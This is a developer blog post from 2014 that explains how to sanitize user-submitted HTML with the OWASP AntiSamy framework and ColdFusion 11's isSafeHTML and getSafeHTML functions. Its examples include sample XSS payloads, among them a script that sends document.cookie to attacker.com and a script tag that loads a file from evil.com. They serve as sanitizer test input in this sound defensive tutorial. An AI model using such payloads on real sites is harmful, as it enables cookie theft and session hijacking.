Pavan's ColdFusion Blog: Using Antisamy Framework with ColdFusion 11

Wednesday, April 9, 2014

Using Antisamy Framework with ColdFusion 11

AntiSamy is an OWASP API for sanitizing HTML/CSS input. ColdFusion 11 provides HTML/CSS sanitization functions that do their job based on a given AntiSamy policy file. If you are already familiar with the AntiSamy framework, skip to the section Integration with ColdFusion.

Need for AntiSamy:

Cross-site scripting (XSS) is one of the most common security vulnerabilities found in web applications. XSS exploits weaknesses in the web application code that allow an attacker to inject malicious code (JavaScript) and execute it in the end user's browser. Serious threats posed by XSS include session hijacking by stealing authentication information such as cookies, stealing sensitive data loaded in the web page, and performing operations on behalf of the victim.

XSS vulnerabilities can be classified into three types. The first is DOM-based XSS, which exists in the client-side web page. The second is Non-Persistent or Reflected XSS, where the malicious input is displayed back on the screen after a round trip to the server. The third, and the most dangerous, is Persistent (also called Second Order or Stored) XSS, where the malicious data is stored in persistent storage such as a database. One of the primary causes of XSS is the lack of proper validation/escaping mechanisms. To defend against such attacks, different encoding/escaping mechanisms need to be used depending on where the input is placed in the HTML. ColdFusion provides several encoding/escaping functions which help in validating the input and prevent many forms of XSS.

Many websites want to let users post HTML markup so that they can submit formatted and interactive content. In that case encoding/escaping cannot be performed on the posted HTML markup, because the input needs to be rendered in the browser. Forums and blogs are places where content posted by one user is displayed to other users of the website, so not encoding/escaping the unverified input opens up new possibilities for XSS. One option is to use markup languages such as BBCode and WikiText, which provide an alternate set of markup tags similar to HTML. Their parsers convert these tags to the equivalent HTML and can effectively whitelist the allowed formatting tags, but this approach cannot leverage HTML itself and forces users to learn a new language.

One last option could be to devise an XSD schema file that defines the list of allowed HTML tags and attributes, convert the given HTML input to XML, and then validate the XML against the XSD schema. This gives a flexible implementation with whitelisting of tags. The problems with XSD schema validation are that it provides no response or error message to the user, and that the XSD needs to be created for all HTML elements.

AntiSamy Framework:

AntiSamy solves the problem of allowing HTML content while protecting the application from attacks like XSS. It is a framework that sanitizes/validates input markup, which can contain HTML and CSS, according to a given policy file. AntiSamy is an OWASP open source API that accepts user-submitted HTML/CSS and limits the potentially malicious content that gets through. It follows the whitelist approach to produce clean HTML/CSS output markup. It also provides user-friendly error messages that tell the user which HTML, validation or security errors were found.

An AntiSamy policy file is an XML file which defines a set of rules such as the following:

Which HTML tags need to be removed, filtered, validated or encoded.
Validation rules for HTML tag attribute values, written using regular expressions and constant values.
CSS parsing rules that validate each CSS property individually, using regular expressions and constant values.

AntiSamy only validates/sanitizes the input according to the given policy file, so the protection always depends on how strictly the policy file is written. For more information on AntiSamy, visit the OWASP AntiSamy Project page at https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project and check out the AntiSamy developer guide to understand policy files and how to define them according to your requirements.
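
As a rough illustration of the three kinds of rules listed above, a policy fragment might look like the sketch below. The element and attribute names follow the layout of the OWASP sample policy files as best I recall it. The specific tags, literal values and the colorCode expression are chosen only for illustration, and this is not a complete policy file, so compare it with the sample files before relying on it.

```xml
<!-- Illustrative fragment only; not a complete AntiSamy policy -->
<common-regexps>
    <!-- Named regular expression that attribute rules can refer to -->
    <regexp name="colorCode" value="(#([0-9a-fA-F]{6}|[0-9a-fA-F]{3}))"/>
</common-regexps>

<tag-rules>
    <!-- Remove the tag together with its content -->
    <tag name="script" action="remove"/>

    <!-- Keep the tag, but validate an attribute value against a regular expression -->
    <tag name="font" action="validate">
        <attribute name="color">
            <regexp-list>
                <regexp name="colorCode"/>
            </regexp-list>
        </attribute>
    </tag>

    <!-- Keep the tag, but validate an attribute value against constant values -->
    <tag name="p" action="validate">
        <attribute name="align">
            <literal-list>
                <literal value="left"/>
                <literal value="right"/>
                <literal value="center"/>
            </literal-list>
        </attribute>
    </tag>
</tag-rules>

<css-rules>
    <!-- Each CSS property is validated individually -->
    <property name="text-align" description="Alignment of text inside a block">
        <literal-list>
            <literal value="left"/>
            <literal value="right"/>
            <literal value="center"/>
            <literal value="justify"/>
        </literal-list>
    </property>
</css-rules>
```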

AntiSamy uses NekoHTML and the given policy file to validate the HTML/CSS input markup. NekoHTML is a simple HTML scanner and tag balancer that enables application programmers to parse HTML documents and access the information using standard XML interfaces. The parser can scan HTML files and "fix up" many common mistakes that human (and computer) authors make in writing HTML documents. NekoHTML adds missing parent elements, automatically closes elements with optional end tags, and can handle mismatched inline element tags. After reading the input with NekoHTML, AntiSamy builds a DOM tree out of it and then validates all of its nodes against the given policy file.

AntiSamy provides the following boilerplate policy files, which can be downloaded from the OWASP project page and modified further to meet your project requirements.

antisamy-slashdot.xml - This policy file only allows strict text formatting, and may be a good choice if users are submitting HTML in a comment thread.

antisamy-ebay.xml – This policy file gives the user a little bit of freedom, and may be a good choice if users are submitting HTML for a large portion of a page.

antisamy-myspace.xml – This policy file gives the user a lot of freedom, and may be a good choice if users are submitting HTML for an entire page.

antisamy-tinymce.xml - This policy file only allows text formatting, and may be a good choice if users are submitting HTML to be used in a blog post.

antisamy-anythinggoes.xml – A very dangerous policy file that allows all HTML, CSS and JavaScript. You shouldn't use this in production.

When to use AntiSamy:

If you are accepting plain text data from the user, use the ESAPI-based encoding functions provided by ColdFusion to make it safe to display in the web browser. ColdFusion provides the following functions for this purpose:

encodeForHTML, encodeForHTMLAttribute, encodeForCSS, encodeForJavaScript and encodeForURL
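
A minimal sketch of how these functions map to output contexts. The variable userName and the page profile.cfm are hypothetical; in a real page the value would come from the form or URL scope.

```cfml
<!--- Hypothetical untrusted value; normally taken from the form or URL scope --->
<cfset userName = "<script>alert('xss')</script>">

<cfoutput>
    <!--- HTML body context --->
    <p>Hello, #encodeForHTML(userName)#</p>

    <!--- HTML attribute context --->
    <input type="text" name="userName" value="#encodeForHTMLAttribute(userName)#">

    <!--- URL parameter context --->
    <a href="profile.cfm?name=#encodeForURL(userName)#">Profile</a>

    <!--- JavaScript string context --->
    <script>var displayName = '#encodeForJavaScript(userName)#';</script>
</cfoutput>
```

The point is that the encoder is chosen by where the value lands in the page, not by where the value came from.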

If you accept HTML markup from the user, use the AntiSamy functions provided by ColdFusion 11. Before you start, decide which tags, attributes and CSS rules you need, and define the regular expressions and constant literals for the values allowed in each attribute. If your requirements are close to one of the example policy files shipped by AntiSamy, modify that file to fit. Devise the policy rules according to your requirements while keeping XSS in mind.

Integration with ColdFusion:

ColdFusion 11 adds new functions that sanitize/validate input based on a given AntiSamy policy file. ColdFusion 11 ships a basic AntiSamy policy file which is fairly permissive. This policy file allows most HTML elements, and may be useful if users are submitting full HTML pages. Two functions, isSafeHTML and getSafeHTML, were added to work with AntiSamy policies.

isSafeHTML validates whether the provided input string conforms to the rules defined in the AntiSamy policy. getSafeHTML returns the clean HTML or, if requested, raises the policy violation errors (what went wrong with the input) as per the policy.

getSafeHTML(unsafeHTML [, policyFile [, throwOnError]])
isSafeHTML(unsafeHTML [, policyFile])

unsafeHTML

     The HTML input markup text to sanitize

policyFile (Optional)

     Specify the path to the AntiSamy policy file. The path can be absolute or relative to the Application.cfc/cfm.

throwOnError (Optional)

      If set to true and the given input violates the HTML rules specified in the policy file, an exception is thrown. The exception message contains the list of violations raised by the input. If set to false, no exception is thrown and the function returns the HTML content filtered and cleaned according to the policy rules. Defaults to false.

As you can see, the policy file argument for these functions is optional. An AntiSamy policy file can be specified at the function, application and server levels. The default server-level AntiSamy policy file, antisamy-basic.xml, can be found at <CF_HOME>\lib\antisamy-basic.xml. To specify the policy file at the application level, set the application setting this.security.antisamypolicy to the location of the policy file. If no policy file location is passed to the functions, ColdFusion checks whether a policy file is configured at the application level. If one is configured it is used; otherwise the server-level AntiSamy policy file is used.

Application.cfc
component
{
    this.security.antisamypolicy = "antisamy.xml"; // Path can be absolute or relative to the application cfc path.
}
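
The lookup order described above can be sketched as follows. The variable userMarkup is hypothetical, and the policy path is just a sample location.

```cfml
<!--- userMarkup is a hypothetical variable holding user-submitted HTML --->
<cfset userMarkup = "<b>Hello</b><script>alert(1)</script>">

<!--- No policy argument: the application-level policy is used if
      this.security.antisamypolicy is set, otherwise the server-level
      antisamy-basic.xml is used --->
<cfset cleanDefault = getSafeHTML(userMarkup)>

<!--- Function-level policy: applies to this call only and takes
      precedence over the application and server settings --->
<cfset cleanStrict = getSafeHTML(userMarkup, "C:\antisamy-slashdot.xml")>
```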

Here is an example showing how to use these functions

Examples:

In these examples we will use the policy file antisamy-slashdot.xml from OWASP. The policy strictly allows only the <b> <i> <p> <br> <a> <ol> <ul> <li> <dl> <dt> <dd> <em> <strong> <tt> <blockquote> <div> <ecode> <quote> tags, and no CSS is allowed. isSafeHTML validates the input against the policy and returns true or false, and getSafeHTML sanitizes the input by filtering out violations and returns the clean HTML markup. As these are examples I am using static text input; when using these functions in an application, replace it with the relevant form variables.

<cfset inputHTML = "<script>function geturl(){return 'http://attacker.com?cookie='+document.cookie;}</script><b>You have won an IPAD.</b><a href='javascript:geturl()'>Click here to cliam the prize</a>">


<!--- Example 1: Check whether input is according to policy rules --->

<cfset isSafe = isSafeHTML(inputHTML, "C:\antisamy-slashdot.xml")>

<cfoutput>is Safe HTML: #isSafe#</cfoutput>

<!--- Example 2: Check whether input is according to policy rules --->
<cfset anotherInput = "<div><b>Hello World!!</b><br/>lorem ipsum lorem ipsum</div>">

<cfset isSafe = isSafeHTML(anotherInput, "C:\antisamy-slashdot.xml")>

<cfoutput>is Safe HTML: #isSafe#</cfoutput>

<!--- Example 3: Get safe HTML by filtering out invalid input, using the server-level policy antisamy-basic.xml when no application-level setting is specified --->

<cfset safeHTML = getSafeHTML(inputHTML, "", false)>
<cfoutput> 
  Thanks for submitting the content #safeHTML# <br/> 
</cfoutput> 

<!--- Example 4: Get safe HTML when no violations are present; otherwise report the violations --->
<cftry>
    <cfset safeHTML = getSafeHTML(inputHTML, "C:\antisamy-slashdot.xml", true)>
    <cfoutput>
        Thanks for submitting the content #safeHTML# <br/>
    </cfoutput>
    <cfcatch type="application">
        <cfoutput>Invalid Input markup. Please correct the below errors then submit the input again <br/><br/>#cfcatch.detail#</cfoutput>
    </cfcatch>
</cftry>

<!--- Example 5: Shows how AntiSamy fixes up invalid HTML (the closing </p> tag is missing) --->
<cfset inputHTML = "<p>This is <b onclick='alert(bang!)'>so</b> cool!!<img src='http://example.com/logo.jpg'><script src='http://evil.com/attack.js'>">
<cfset safeHTML = getSafeHTML(inputHTML, "", false)>
<cfoutput>#safeHTML#</cfoutput>

The antisamy-slashdot policy is configured not to allow script tags or JavaScript execution from the href attribute of an anchor tag, so the input is considered unsafe and isSafeHTML returns No in Example 1. In Example 2 the input contains only div, b and br tags, which are allowed by the policy, so isSafeHTML returns Yes.

<!-- Excerpts copied from antisamy-slashdot.xml -->

<regexp name="onsiteURL" value="([\p{L}\p{N}\\/\.\?=\#&amp;;\-_~]+|\#(\w)+)"/>
<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[~\p{L}\p{N}\p{Zs}\-_\.@\#\$%&amp;;:,\?=/\+!\(\)]*(\s)*"/>

<regexp-list>
    <regexp name="onsiteURL"/>
    <regexp name="offsiteURL"/>
</regexp-list>

<tag-rules>
    <!--  Tags related to JavaScript  -->
    <tag action="remove" name="script"/>

    <!--  Anchor and anchor related tags  -->
    <tag action="validate" name="a">
        <attribute name="href" onInvalid="filterTag"/>
    </tag>
</tag-rules>

Example 3 shows how to get clean HTML by filtering out the violations as per the policy. It gives the output "Thanks for submitting the content You have won an IPAD. Click here to cliam the prize". The script tag is removed from the input. The anchor tag contains an invalid value in its href attribute, so the tag itself is filtered out while the content inside it is kept. As the <b> tag is allowed, it is kept as it is.

Example 4 shows how to get the user-friendly policy violation messages using getSafeHTML. It gives the output "The script tag is not allowed for security reasons. This tag should not affect the display of the input. The a tag contained an attribute that we could not process. The href attribute had a value of "javascript:geturl()". This value could not be accepted for security reasons. We have chosen to filter the a tag in order to continue processing the input.". Example 5 shows how getSafeHTML fixes up invalid HTML. It gives the output "This is so cool!!", with the missing end paragraph (p) tag added.
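
With real form input, the two functions could be combined roughly as in the sketch below. The form field name comment is hypothetical, and the policy path is the sample location used in the examples above.

```cfml
<!--- Hypothetical form field; default to empty when the form was not submitted --->
<cfparam name="form.comment" default="">
<cfset policyPath = "C:\antisamy-slashdot.xml">

<cfif len(trim(form.comment))>
    <!--- Always store and display the sanitized markup, never the raw input --->
    <cfset cleanComment = getSafeHTML(form.comment, policyPath, false)>

    <!--- Tell the user when something had to be removed --->
    <cfif NOT isSafeHTML(form.comment, policyPath)>
        <p>Some markup was not allowed and has been removed from your comment.</p>
    </cfif>

    <cfoutput>#cleanComment#</cfoutput>
</cfif>
```

Using the output of getSafeHTML even when isSafeHTML returns true keeps a single code path for what gets stored and displayed.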

Further Reading:

https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project
https://code.google.com/p/owaspantisamy/downloads/list
http://nekohtml.sourceforge.net/